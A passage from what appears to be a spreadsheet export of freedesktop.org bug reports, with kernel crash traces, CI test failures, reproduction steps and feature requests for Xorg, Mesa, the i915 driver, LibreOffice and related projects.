[   22.000304] R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000
[   22.000306] R13: 0000000000000000 R14: 0000000000000463 R15: ffffffffffffffff
[   22.000309] Code: 48 8b 86 d8 00 00 00 48 01 42 28 48 8b 86 10 01 00 00 48 81 c6 10 01 00 00 48 2d e0 01 00 00 48 8d 88 e0 01 00 00 48 39 f1 74 55  80 98 00 00 00 01 74 3d f6 80 e1 00 00 00 01 74 0a 48 8b 48 
[   22.000349] RIP: per_file_stats+0x6a/0xc3 RSP: ffffae7001047c88
[   22.000352] ---[ end trace 9d32ae44854cdd18 ]---
[   22.003475] Kernel panic - not syncing: Fatal exception
[   22.003499] Kernel Offset: 0xd800000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)
[   22.006554] ACPI MEMORY or I/O RESET_REG.</t>
  </si>
  <si>
    <t>abhay.kumar</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-26519</t>
  </si>
  <si>
    <t>Use right locale name for arabic</t>
  </si>
  <si>
    <t>Created attachment 33222
Use ar.po instead of ara.po
Apparently ara.po and ar.po were both committed for arabic by the same person on the same day. They contain the same translations but ar.po is a bit more complete. And the standard locale name is ar.
So I propose to kill ara.po.</t>
  </si>
  <si>
    <t>XORG-37643</t>
  </si>
  <si>
    <t>Regression in 2.6.39 : ICC profile loading does not have any effect anymore</t>
  </si>
  <si>
    <t>When I load my ICC profile there is no error. moreover when reading the LUT the ICC profile is in memory from informations I get from argyllcms tool.
BUT : there is no visual change : the ICC profile has no more effect. Visually it's a no-op operation with 2.6.39.
Downgrading to 2.6.38.7 fixes the issue.
Configuration :
- xorg 1.10.1.902
- x11-drivers/xf86-video-nouveau GIT from 20110323 (last git change)
- kernel 2.6.39 (nouveau DRM KMS enabled)
- nvidia quadro NVS 290 (NV86)
- Loading the ICC profile inside the LUT :
$ argyll-dispwin -v -I /usr/share/color/icc/SyncMaster214T.icc
About to open dispwin object on the display
About to install '/usr/share/color/icc/SyncMaster214T.icc' as display's default profile
Installed '/usr/share/color/icc/SyncMaster214T.icc' and made it the default
About to destroy dispwin object
- Then checking the LUT state :
$ argyll-dispwin -v -V /usr/share/color/icc/SyncMaster214T.icc
About to open dispwin object on the display
Verify: '/usr/share/color/icc/SyncMaster214T.icc' IS loaded (discrepancy 0.0%)
About to destroy dispwin object
When I load the profile Xorg.0.log output this logs lines :
[385923.064] (II) NOUVEAU(0): EDID vendor SAM prod id 464
[385923.064] (II) NOUVEAU(0): Using hsync ranges from config file
[385923.064] (II) NOUVEAU(0): Using vrefresh ranges from config file
[385923.064] (II) NOUVEAU(0): Printing DDC gathered Modelines:
[385923.064] (II) NOUVEAU(0): Modeline 1600x1200x0.0  162.00  1600 1664 1856 2160  1200 1201 1204 1250 +hsync +vsync (75.0 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 800x600x0.0   40.00  800 840 968 1056  600 601 605 628 +hsync +vsync (37.9 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 800x600x0.0   36.00  800 824 896 1024  600 601 603 625 +hsync +vsync (35.2 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 640x480x0.0   31.50  640 656 720 840  480 481 484 500 -hsync -vsync (37.5 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 640x480x0.0   31.50  640 664 704 832  480 489 492 520 -hsync -vsync (37.9 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 640x480x0.0   30.24  640 704 768 864  480 483 486 525 -hsync -vsync (35.0 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 640x480x0.0   25.18  640 656 752 800  480 490 492 525 -hsync -vsync (31.5 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 720x400x0.0   28.32  720 738 846 900  400 412 414 449 -hsync +vsync (31.5 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 1280x1024x0.0  135.00  1280 1296 1440 1688  1024 1025 1028 1066 +hsync +vsync (80.0 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 1024x768x0.0   78.75  1024 1040 1136 1312  768 769 772 800 +hsync +vsync (60.0 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 1024x768x0.0   75.00  1024 1048 1184 1328  768 771 777 806 -hsync -vsync (56.5 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 1024x768x0.0   65.00  1024 1048 1184 1344  768 771 777 806 -hsync -vsync (48.4 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 832x624x0.0   57.28  832 864 928 1152  624 625 628 667 -hsync -vsync (49.7 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 800x600x0.0   49.50  800 816 896 1056  600 601 604 625 +hsync +vsync (46.9 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 800x600x0.0   50.00  800 856 976 1040  600 637 643 666 +hsync +vsync (48.1 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 1152x864x0.0  108.00  1152 1216 1344 1600  864 865 868 900 +hsync +vsync (67.5 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 1280x1024x0.0  108.00  1280 1328 1440 1688  1024 1025 1028 1066 +hsync +vsync (64.0 kHz)
[385923.064] (II) NOUVEAU(0): Modeline 1280x960x0.0  108.00  1280 1376 1488 1800  960 961 964 1000 +hsync +vsync (60.0 kHz)
If you need some more information just ask !
Thanks.</t>
  </si>
  <si>
    <t>casta+freedesktop</t>
  </si>
  <si>
    <t>DRI-110550</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@i915_selftest@mock_requests - incomplete - ODEBUG: free active (active state 0) object type: work_struct hint: __i915_gem_free_work+0x0/0x90 [i915]</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_6004/shard-skl6/igt@i915_selftest@mock_requests.html
 [135.075742]  ? i915_gem_free_object+0x110/0x110 [i915]
 [135.076399]  ? i915_gem_context_free+0xc1/0x240 [i915]
 [135.076878]  ? i915_gem_context_free+0xc1/0x240 [i915]
 [135.077208]  i915_gem_context_free+0xc1/0x240 [i915]
 [135.235091] ODEBUG: free active (active state 0) object type: work_struct hint: __i915_gem_free_work+0x0/0x90 [i915]
 [135.235654] CPU: 0 PID: 1037 Comm: i915_selftest Tainted: G     U  W         5.1.0-rc6-CI-CI_DRM_6004+ #1
 [135.237482]  i915_request_mock_selftests+0x2a/0x70 [i915]
 [135.238561]  i915_mock_selftests+0x27/0x50 [i915]
 [135.238989]  i915_init+0x12/0x73 [i915]
 [135.240929] i915_selftest/1037 is trying to acquire lock:
 [135.241228]        i915_request_mock_selftests+0x2a/0x70 [i915]
 [135.241236]        i915_mock_selftests+0x27/0x50 [i915]
 [135.241240]        i915_init+0x12/0x73 [i915]
 [135.241358] 1 lock held by i915_selftest/1037:
 [135.241386] CPU: 0 PID: 1037 Comm: i915_selftest Tainted: G     U  W         5.1.0-rc6-CI-CI_DRM_6004+ #1
 [135.241455]  ? __i915_gem_free_objects+0x720/0x720 [i915]
 [135.241462]  ? __i915_gem_free_objects+0x720/0x720 [i915]
 [135.241491]  i915_request_mock_selftests+0x2a/0x70 [i915]
 [135.241503]  i915_mock_selftests+0x27/0x50 [i915]
 [135.241506]  i915_init+0x12/0x73 [i915]</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-27419</t>
  </si>
  <si>
    <t>Account Request: Krzysztof Klinikowski</t>
  </si>
  <si>
    <t>Created attachment 34605
gpg key
Name: Krzysztof Klinikowski
Email address: kkszysiu gmail  com
Prefered account name: kkszysiu</t>
  </si>
  <si>
    <t>HAL-18027</t>
  </si>
  <si>
    <t>HP_RECOVERY partition not ignored</t>
  </si>
  <si>
    <t>Created attachment 19597
Patch
Using (on Fedora 9):
hal-0.5.11-2.fc9.x86_64
hal-info-20080607-1.fc9.noarch
My HP 6500 laptop's recovery partition is no longer ignored by hal and its mounted when I log in. Looking at the exceptions in 20-storage-methods.fdi there is a rule:
          true
However this doesn't match for me because the recovery partition is NTFS. I'm not sure why anything is checking the fstype but I've attached a patch to look for either.
The hard drive got replaced by HP (under warranty) and it broke then. I don't have the old drive to compare against.</t>
  </si>
  <si>
    <t>bbaetz</t>
  </si>
  <si>
    <t>XORG-69477</t>
  </si>
  <si>
    <t>Disable VT switching and enable VT sharing by default for non-seat0 seats</t>
  </si>
  <si>
    <t>Currently systemd-multi-seat-x wrapper is still needed in some multiseat setups.
When -seat option is passed with an argument different from seat0 systemd-multi-seat-x does the following:
1. pass option -sharevts to real X server
2. create a special xorg.conf file with the following content (or similar):
Section ServerFlags
    Option DontVTSwitch true
EndSection
Section InputClass
    Identifier Force input devices to seat
    Option GrabDevice true
EndSection
The purpose of this bug is to enable VT sharing (no need of passing -sharevts) and disable VT switching (no need of Option DontVTSwitch true in xorg.conf) when seat is not seat0.
Another patch for evdev driver is needed to get rid of Option GrabDevice true in xorg.conf</t>
  </si>
  <si>
    <t>lbsousajr</t>
  </si>
  <si>
    <t>DRI-111249</t>
  </si>
  <si>
    <t>[CI][BAT] igt@i915_selftest@* / reload tests - dmesg-warn - DEBUG_LOCKS_WARN_ON(lock-&gt;magic != lock)</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_6571/fi-byt-clapper/igt@i915_module_load@reload-with-fault-injection.html
 [318.260827] ------------[ cut here ]------------
 [318.260849] DEBUG_LOCKS_WARN_ON(lock-&gt;magic != lock)
 [318.260864] WARNING: CPU: 1 PID: 2112 at kernel/locking/mutex.c:912 __mutex_lock+0x750/0x9b0
 [318.260899] Modules linked in: i915(-) snd_hda_codec snd_hwdep snd_hda_core snd_pcm vgem coretemp crct10dif_pclmul crc32_pclmul ghash_clmulni_intel cdc_ether lpc_ich usbnet r8152 mii i2c_designware_pci prime_numbers btusb btrtl btbcm btintel bluetooth ecdh_generic ecc [last unloaded: i915]
 [318.260976] CPU: 1 PID: 2112 Comm: kworker/u4:13 Tainted: G     U            5.3.0-rc2-CI-CI_DRM_6571+ #1
 [318.261000] Hardware name: GOOGLE Clapper/Clapper BIOS MrChromebox 02/04/2018
 [318.261134] Workqueue: i915 __i915_vm_release [i915]
 [318.261156] RIP: 0010:__mutex_lock+0x750/0x9b0
 [318.261170] Code: c0 0f 84 3a f9 ff ff 44 8b 05 8c a6 97 00 45 85 c0 0f 85 2a f9 ff ff 48 c7 c6 79 43 09 82 48 c7 c7 08 1e 08 82 e8 80 62 6e ff  0b e9 10 f9 ff ff f6 c2 04 0f 84 f3 fa ff ff 48 89 d1 83 e1 03
 [318.261212] RSP: 0018:ffffc9000037fcf0 EFLAGS: 00010282
 [318.261228] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000001
 [318.261247] RDX: 0000000080000001 RSI: 0000000000000000 RDI: ffffffff8112dd4c
 [318.261265] RBP: ffffc9000037fda0 R08: 0000000000000000 R09: 00000000000397c0
 [318.261283] R10: ffffc9000037fdb8 R11: 0000000000000840 R12: 0000000000000000
 [318.261302] R13: ffff88806340b0b0 R14: 0000000000000002 R15: ffff88804d2a9288
 [318.261320] FS:  0000000000000000(0000) GS:ffff888077900000(0000) knlGS:0000000000000000
 [318.261341] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [318.261357] CR2: 000055ca541533a8 CR3: 0000000074b4e000 CR4: 00000000001006e0
 [318.261375] Call Trace:
 [318.261389]  ? __mutex_lock+0x9d/0x9b0
 [318.261403]  ? __mutex_lock+0x44a/0x9b0
 [318.261506]  ? i915_vma_destroy+0x86/0x350 [i915]
 [318.261521]  ? __mutex_lock+0x44a/0x9b0
 [318.261626]  ? i915_vma_destroy+0x86/0x350 [i915]
 [318.261725]  i915_vma_destroy+0x86/0x350 [i915]
 [318.261826]  gen6_ppgtt_cleanup+0x40/0xf0 [i915]
 [318.261927]  __i915_vm_release+0xfc/0x1d0 [i915]
 [318.261949]  process_one_work+0x245/0x610
 [318.261968]  worker_thread+0x37/0x380
 [318.261984]  ? process_one_work+0x610/0x610
 [318.261998]  kthread+0x119/0x130
 [318.262011]  ? kthread_park+0xa0/0xa0
 [318.262027]  ret_from_fork+0x3a/0x50
 [318.262047] irq event stamp: 69029
 [318.262061] hardirqs last  enabled at (69029): [] _raw_spin_unlock_irq+0x24/0x50
 [318.262085] hardirqs last disabled at (69028): [] _raw_spin_lock_irq+0xa/0x40
 [318.262108] softirqs last  enabled at (68976): [] __do_softirq+0x33e/0x4ae
 [318.262131] softirqs last disabled at (68967): [] irq_exit+0xa9/0xc0
 [318.262153] WARNING: CPU: 1 PID: 2112 at kernel/locking/mutex.c:912 __mutex_lock+0x750/0x9b0
 [318.262175] ---[ end trace dd3174496a951280 ]---
 [318.263642] i915 Wakeref last acquired:
   track_intel_runtime_pm_wakeref+0x14/0x90 [i915]
   intel_display_power_get+0x1f/0x60 [i915]
   intel_power_domains_init_hw+0xd3/0x570 [i915]
   i915_driver_probe+0xdfc/0x1950 [i915]
   i915_pci_probe+0x3f/0x1a0 [i915]
   pci_device_probe+0x9e/0x120
   really_probe+0xea/0x3d0
   driver_probe_device+0x10b/0x120
 [318.263740] i915 Wakeref count: 1
 [318.264304] i915 Wakeref x1 taken at:
   track_intel_runtime_pm_wakeref+0x14/0x90 [i915]
   intel_display_power_get+0x1f/0x60 [i915]
   edp_panel_vdd_on+0xd5/0x210 [i915]
   intel_dp_aux_xfer+0xeb/0x920 [i915]
   intel_dp_aux_transfer+0xa7/0x200 [i915]
   drm_dp_dpcd_access+0x76/0x110
   drm_dp_dpcd_read+0x29/0xc0
   intel_dp_read_dpcd+0x38/0x120 [i915]
 [318.801647] Setting dangerous option inject_load_failure - tainting kernel</t>
  </si>
  <si>
    <t>CAIRO-54950</t>
  </si>
  <si>
    <t>Poppler hangs when printing a PDF</t>
  </si>
  <si>
    <t>Created attachment 67194
PDF test case
This bug was reported in Ubuntu Launchpad against Evince then to GNOME Bugzilla but it seems the problem is in poppler.
Steps to reproduce it:
- Open the file with poppler-glib-demo (I tried with master b72c02d1)
- Render the first page
- Print to a file (PDF).</t>
  </si>
  <si>
    <t>XORG-17600</t>
  </si>
  <si>
    <t>[945GM] Recent intel 2D driver and dri driver changes cause X fatal error</t>
  </si>
  <si>
    <t>The recent libdrm intel driver and i915 dri driver changes make X easy crash. Here is one case I can reproduced.
System environment: 
-- chipset: 945GM
-- system architecture: i686
-- xf86-video-intel/xserver/mesa/drm version: 
libdrm: 973c634eaa54ee4085a72102c690bc643cb2d7a8
xf86-video-intel: e2743a409a02978ca8e953dbbeeb96f61bbd5ce6
mesa: 8db761409dadc2e899d4e7107eff3aa07b07aa11
xserver: b6ab114212c0e4c3346ceb5b207f14c526ab81e7
drm: in kernel
-- kernel version: 2.6.27-rc6
-- Linux distribution: Gentoo
-- Machine or mobo model: ThinkPad X60
Reproduce steps:
In gnome use metacity as window manager.
1. start a rxvt-unicode terminal
2. close it
3. start another rxvt-unicode terminal very quickly.</t>
  </si>
  <si>
    <t>MESA-92849</t>
  </si>
  <si>
    <t>[IVB HSW BDW] piglit image load/store load-from-cleared-image.shader_test fails</t>
  </si>
  <si>
    <t>This new piglit test fails on ivb -&gt; bdw:
commit 8768a12e371d0044b9cf54aa858cfdea3007ebcf
CommitDate: Thu Nov 5 12:53:44 2015 -0800
    ARB_shader_image_load_store: Test loading from a cleared image</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-27684</t>
  </si>
  <si>
    <t>Uses Group instead of layout</t>
  </si>
  <si>
    <t>This is a follow-up of https://bugzilla.gnome.org/show_bug.cgi?id=553108
There is one more occurrence of Group in the 
http://translationproject.org/PO-files/hu/xkeyboard-config-1.8.hu.po file:
#: ../rules/base.xml.in.h:272
msgid Group toggle on multiply/divide key</t>
  </si>
  <si>
    <t>DBUS-72840</t>
  </si>
  <si>
    <t>va_copy makro not defined in Visual Studio up to MSVC 2012</t>
  </si>
  <si>
    <t>The makro va_copy introduced in http://cgit.freedesktop.org/dbus/dbus/commit/?id=4ea6eb76f470a45264ea077430f280568c620002 is unfortunately not defined in MS Visual Studio up to 2012. The first time this makro appears is in MSVC 2013.
See here: http://msdn.microsoft.com/de-de/library/kb57fad8.aspx
Hence the current git snapshort fails to build with MSVC older than 2013.</t>
  </si>
  <si>
    <t>blueburn85</t>
  </si>
  <si>
    <t>POPPLER-25405</t>
  </si>
  <si>
    <t>PDF documents with some LaTeX figures fails to render properly</t>
  </si>
  <si>
    <t>This issue has been submitted on the GNOME Bugzilla database for Evince.
See: https://bugzilla.gnome.org/show_bug.cgi?id=529868</t>
  </si>
  <si>
    <t>fleury</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-62263</t>
  </si>
  <si>
    <t>Add walters to accountsservice</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #62235 +++
I've been patching accountsservice recently maintainer asked me to ask for commit access.</t>
  </si>
  <si>
    <t>TELEPATHY-20268</t>
  </si>
  <si>
    <t>Connection's selfContact object should initially have no features</t>
  </si>
  <si>
    <t>15:21  andrunko: I don't think the self-contact should have Alias 
              AvatarToken or SimplePresence by default
15:21  andrunko: it should just have the core Contact things (handle and 
              identifier)
15:21  smcv we don' t have support for contact features on 
                  connection for now and oggis_ prefer to enable all contact 
                  features for now
15:22  channel also enable all features for now
15:22  oggis_ ^
15:22  andrunko oggis_: I strongly disagree. having fewer features 
              auto-enabled is better - moving a feature from you always get 
              it to you have to ask for it is error-prone moving the other 
              way is easy
15:23  and if you auto-enable alias avatar token and simple presence 
              that's several signals that will wake up every tp-qt4 client 
              whether it cares or not
15:24  of course *later* having a way to say by the time you announce 
              a contact on this channel I want its alias would be great
15:24  (more so for channels than for the self-contact though I think)
15:24  yes that[ s the intention
15:25  I think when the self-contact changes it should be announced 
              asap even if it doesn't have its alias/misc yet
15:25  since being able to answer which of these people is me? 
              correctly is quite important</t>
  </si>
  <si>
    <t>DRI-106889</t>
  </si>
  <si>
    <t>[CI] igt@gem_exec_async@concurrent-writes-* - fail - Failed assertion: batch[i] == i</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_59/fi-glk-j4005/igt@gem_exec_async@concurrent-writes-bsd.html
(gem_exec_async:8674) CRITICAL: Test assertion failure function one file ../tests/gem_exec_async.c:170:
(gem_exec_async:8674) CRITICAL: Failed assertion: batch[i] == i
(gem_exec_async:8674) CRITICAL: error: 0 != 0x2
Subtest concurrent-writes-bsd failed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-37951</t>
  </si>
  <si>
    <t>Deinstallation section in faulty README does not exist</t>
  </si>
  <si>
    <t>Created attachment 47562
README of the en-US install tarball
The README file of the LibO_3.4.0rc2_Linux_x86-64_install-rpm_en-US Linux tarball talk about a De-installation section but it has been forgotten.</t>
  </si>
  <si>
    <t>andresalaun</t>
  </si>
  <si>
    <t>PACKAGEKIT-31580</t>
  </si>
  <si>
    <t>Remember the size of the gpk-application dialogs</t>
  </si>
  <si>
    <t>The add/remove update manager software sources software log viewer should all remember their width height and maximization state.
In Fedora 14 they don't and it is very annoying to resize up those dialogs everytime I use them: on a high resolution screen (1600x1200 or more) they show up at ridiculously small sizes and are not efficiently using the screen space.</t>
  </si>
  <si>
    <t>XORG-3089</t>
  </si>
  <si>
    <t>8 bit window crashes &gt;xorg-x11-6.8.0-r3 (gentoo on amd64) in 8+24 bit mode (matrox g450)</t>
  </si>
  <si>
    <t>When an application tries (need to use one that requires that mode) to open a
8bit window in the 8+24 bit overlay mode of the matrox g450 card X dies and
restarts without further details in the logs. Up to version 6.8.0-r3 this worked
fine. (Currently running 6.8.2-r2 tried various other versions. In some
versions the server doesn't even come up with this settings.</t>
  </si>
  <si>
    <t>ingosch</t>
  </si>
  <si>
    <t>LIBREOFFICE-43711</t>
  </si>
  <si>
    <t>FILEOPEN: LibreOffice Calc crashes when opening a xlsx-file</t>
  </si>
  <si>
    <t>When the software has loaded half(approx) the file it crashes.
Syslog says:
kernel: [ 3400.148827] soffice.bin[5919]: segfault at 34 ip abab14b7 sp bfd6ecc0 error 4 in libooxli.so[ab840000+39c000]
uname: 3.0.0-13-generic-pae #22-Ubuntu SMP Wed Nov 2 15:17:35 UTC 2011 i686 i686 i386 GNU/Linux
Happens all the time with large files. Sometimes small files open correctly.
Same behaviour on an old OpenOffice on Ubuntu 10</t>
  </si>
  <si>
    <t>eje.hjelmquist</t>
  </si>
  <si>
    <t>DBUS-6870</t>
  </si>
  <si>
    <t>Leak in glib bindings</t>
  </si>
  <si>
    <t>There's a leak in the glib bindings I'll attach a patch.</t>
  </si>
  <si>
    <t>WAYLAND-85167</t>
  </si>
  <si>
    <t>Weston running the rpi backend crashes when a window that uses EGL is closed.</t>
  </si>
  <si>
    <t>Reproducible with the wayland clients/simple-egl application by simply
pressing 'esc' on the window (closes the window) or doing 'ctrl-c' on
the terminal. The result is a Weston crash.
What happens is that the buffer is set to NULL while still used.
See
http://patchwork.freedesktop.org/patch/34885/
for a fix.
-Yves</t>
  </si>
  <si>
    <t>LIBREOFFICE-47560</t>
  </si>
  <si>
    <t>EDITING: queries open for reediting: only last out-of-order sort column kept (duplicated)</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #47370 +++
Found in versions:
 * branch libreoffice-3-5 with fix for bug 47370 applied.
Reproduction case: attachment 57874 from bug 46843
Open query order_job_name in SQL mode. Add:
  number ASC
to the end of the SQL to add sorting by number after job and name.
Open in design mode (graphical editor). Order becomes job number number: number is there twice:
column:   name      job    number  number
table:    tbl1      tbl1   tbl1    tbl1
sort:     (none)    asc    asc     asc
display:   yes      yes    no      no
(I'll commit the fix in a few minutes)</t>
  </si>
  <si>
    <t>LIBREOFFICE-45553</t>
  </si>
  <si>
    <t>New RTF import filter deletes gaps between paragraphs</t>
  </si>
  <si>
    <t>Created attachment 56538
RTF imported in LibO 3.5 with new errors
This bug was found by friend but he doesn't speak English at all so I post this issue on my account
3.4 keeps all gaps but in 3.5 text is solid and without spaces.
Attached RTF file was generated by external software.</t>
  </si>
  <si>
    <t>quest-88</t>
  </si>
  <si>
    <t>DRI-88933</t>
  </si>
  <si>
    <t>[all Bisected]igt/gem_reset_stats doesn't exit testing</t>
  </si>
  <si>
    <t>Created attachment 113086
dmesg
==System Environment==
--------------------------
Regression: Yes
no-working platforms: all
==kernel==
--------------------------
drm-intel-nightly/8b4216f91c7bf8d3459cadf9480116220bd6545e
commit 8b4216f91c7bf8d3459cadf9480116220bd6545e
Author: Daniel Vetter 
Date:   Sat Jan 31 17:46:32 2015 +0100
    drm-intel-nightly: 2015y-01m-31d-16h-46m-12s UTC integration manifest
==Bug detailed description==
-----------------------------
It takes more than 10 minutes and doesn't exit testing on all platforms with drm-intel-nightly and drm-intel-next-queued kernel works well on drm-intel-fixes kernel.
run ./gem_reset_stats --run-subtest ban-blt output:
IGT-Version: 1.9-g51d87b8 (x86_64) (Linux: 3.19.0-rc5_kcloud_b8d24a_20150202+ x86_64)
^C(gem_reset_stats:4109) drmtest-WARNING: Warning on condition flags != 0 in fucntion check_stop_rings file drmtest.c:112
(gem_reset_stats:4109) drmtest-WARNING: i915_ring_stop flags on exit 0x80000004 can't quiescent gpu cleanly
real    11m57.087s
user    0m0.005s
sys     0m0.012s
dmesg:
[   94.782567] WARNING: CPU: 3 PID: 1057 at drivers/gpu/drm/i915/i915_irq.c:2615 i915_handle_error+0x54/0x5b0 [i915]()
[   94.782606] WARN_ON(mutex_is_locked(&amp;dev_priv-&gt;dev-&gt;struct_mutex))
[   94.782630] Modules linked in:
[   94.782647]  dm_mod snd_hda_codec_hdmi snd_hda_codec_idt snd_hda_codec_generic iTCO_wdt iTCO_vendor_support ppdev pcspkr serio_raw uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep snd_pcm firewire_ohci firewire_core crc_itu_t lpc_ich mfd_core snd_timer snd soundcore wmi parport_pc parport tpm_infineon tpm_tis tpm battery ac acpi_cpufreq joydev i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[   94.782916] CPU: 3 PID: 1057 Comm: kworker/u16:5 Not tainted 3.19.0-rc5_kcloud_b8d24a_20150202+ #26
[   94.782950] Hardware name: Hewlett-Packard HP EliteBook 8460p/161C BIOS 68SCF Ver. F.22 12/22/2011
[   94.782994] Workqueue: i915-hangcheck i915_hangcheck_elapsed [i915]
[   94.783021]  0000000000000000 0000000000000009 ffffffff8178902f ffff880137c83cc8
[   94.783059]  ffffffff8103bc4a 0000000000000246 ffffffffa00b429f 00000000000006f6
[   94.783097]  ffff880133465300 ffff880002908ad0 ffff880002eae800 ffff880002c2da00
[   94.783135] Call Trace:
[   94.783150]  [] ? dump_stack+0x40/0x50
[   94.783174]  [] ? warn_slowpath_common+0x98/0xb0
[   94.783210]  [] ? i915_handle_error+0x54/0x5b0 [i915]
[   94.783257]  [] ? warn_slowpath_fmt+0x45/0x4a
[   94.783312]  [] ? i915_handle_error+0x54/0x5b0 [i915]
[   94.783361]  [] ? printk+0x48/0x4d
[   94.783405]  [] ? i915_hangcheck_elapsed+0x325/0x3bf [i915]
[   94.783435]  [] ? process_one_work+0x1b2/0x314
[   94.783461]  [] ? worker_thread+0x24d/0x339
[   94.783485]  [] ? cancel_delayed_work_sync+0xa/0xa
[   94.783511]  [] ? kthread+0xce/0xd6
[   94.783532]  [] ? kthread_create_on_node+0x162/0x162
[   94.783560]  [] ? ret_from_fork+0x7c/0xb0
[   94.783584]  [] ? kthread_create_on_node+0x162/0x162
[   94.783610] ---[ end trace c20f2077c4395952 ]---
Bisect shows: b8d24a06568368076ebd5a858a011699a97bfa42 is the first bad commit.
commit b8d24a06568368076ebd5a858a011699a97bfa42
Author:     Mika Kuoppala 
AuthorDate: Wed Jan 28 17:03:14 2015 +0200
Commit:     Daniel Vetter 
CommitDate: Thu Jan 29 18:03:07 2015 +0100
    drm/i915: Remove nested work in gpu error handling
    Now when we declare gpu errors only through our own dedicated
    hangcheck workqueue there is no need to have a separate workqueue
    for handling the resetting and waking up the clients as the deadlock
    concerns are no more.
    The only exception is i915_debugfs::i915_set_wedged which triggers
    error handling through process context. However as this is only used through
    test harness it is responsibility for test harness not to introduce hangs
    through both debug interface and through hangcheck mechanism at the same time.
    Remove gpu_error.work and let the hangcheck work do the tasks it used to.
    v2: Add a big warning sign into i915_debugfs::i915_set_wedged (Chris)
    Cc: Chris Wilson 
    Signed-off-by: Mika Kuoppala 
    Reviewed-by: Chris Wilson 
    Signed-off-by: Daniel Vetter 
==Reproduce steps==
---------------------------- 
1.time ./gem_reset_stats --run-subtest ban-blt</t>
  </si>
  <si>
    <t>MESA-96958</t>
  </si>
  <si>
    <t>[SKL] Improper rendering in Europa Universalis IV</t>
  </si>
  <si>
    <t>Created attachment 125105
Example of redenring with artefacts
Hello
The Intel driver appears not to render textures properly. The textures look smoother and slihgtly blocky as if they were strongly compressed. When forcing software rendering by setting the LIBGL_ALWAYS_SOFTWARE environment variable everything appears to be rendered properly.
I am running Mesa 12.0.1 (I selected 11.2 as 12.0 is not available in the form but note that this has been a long standing issues not a recent regression).
Here is the game's log when using the intel driver. Comparing it to when using the software rendering one important difference is that there is no anisotropic rendering. Fiddling a bit in the game's configuration file to increase a parameter called maxanisotropy makes things look even worse.
[gfx_opengl.cpp:3230]: Loading settings for adapter -1 fullscreen=1 multisample=15
[gfx_opengl.cpp:3298]: Checking for multi-sampling support:
[gfx_opengl.cpp:3323]: MaxTextureWidth: 8192
[gfx_opengl.cpp:3324]: MaxTextureHeight: 8192
[graphicssettings.cpp:152]: 	2 samples supported.
[graphicssettings.cpp:152]: 	4 samples supported.
[graphicssettings.cpp:152]: 	8 samples supported.
[graphicssettings.cpp:152]: 	16 samples supported.
[graphicssettings.cpp:184]: Support for Anisotropic filtering found.
[graphicssettings.cpp:187]: 	Max Anisotropic filtering supported: 16
[graphicssettings.cpp:188]: 	Anisotropic filtering set to: 0
[gfx_opengl.cpp:3230]: Loading settings for adapter -1 fullscreen=1 multisample=15
[gfx_opengl.cpp:3298]: Checking for multi-sampling support:
[gfx_opengl.cpp:3323]: MaxTextureWidth: 8192
[gfx_opengl.cpp:3324]: MaxTextureHeight: 8192
[graphicssettings.cpp:152]: 	2 samples supported.
[graphicssettings.cpp:152]: 	4 samples supported.
[graphicssettings.cpp:152]: 	8 samples supported.
[graphicssettings.cpp:152]: 	16 samples supported.
[graphicssettings.cpp:184]: Support for Anisotropic filtering found.
[graphicssettings.cpp:187]: 	Max Anisotropic filtering supported: 16
[graphicssettings.cpp:188]: 	Anisotropic filtering set to: 4
[graphicssettings.cpp:726]: Using multisampling: 4
[graphicssettings.cpp:726]: Using multisampling: 4
[graphics.cpp:811]: Creating device with: HARDWARE_VERTEXPROCESSING
	Fullscreen=no
	Resolution=1000x600
[gfx_opengl.cpp:1033]: 
OpenGL Version: 3.0 Mesa 12.0.1
Supported Extensions:
GL_ARB_multisample
GL_EXT_abgr
GL_EXT_bgra
GL_EXT_blend_color
GL_EXT_blend_minmax
GL_EXT_blend_subtract
GL_EXT_copy_texture
GL_EXT_polygon_offset
GL_EXT_subtexture
GL_EXT_texture_object
GL_EXT_vertex_array
GL_EXT_compiled_vertex_array
GL_EXT_texture
GL_EXT_texture3D
GL_IBM_rasterpos_clip
GL_ARB_point_parameters
GL_EXT_draw_range_elements
GL_EXT_packed_pixels
GL_EXT_point_parameters
GL_EXT_rescale_normal
GL_EXT_separate_specular_color
GL_EXT_texture_edge_clamp
GL_SGIS_generate_mipmap
GL_SGIS_texture_border_clamp
GL_SGIS_texture_edge_clamp
GL_SGIS_texture_lod
GL_ARB_framebuffer_sRGB
GL_ARB_multitexture
GL_EXT_framebuffer_sRGB
GL_IBM_multimode_draw_arrays
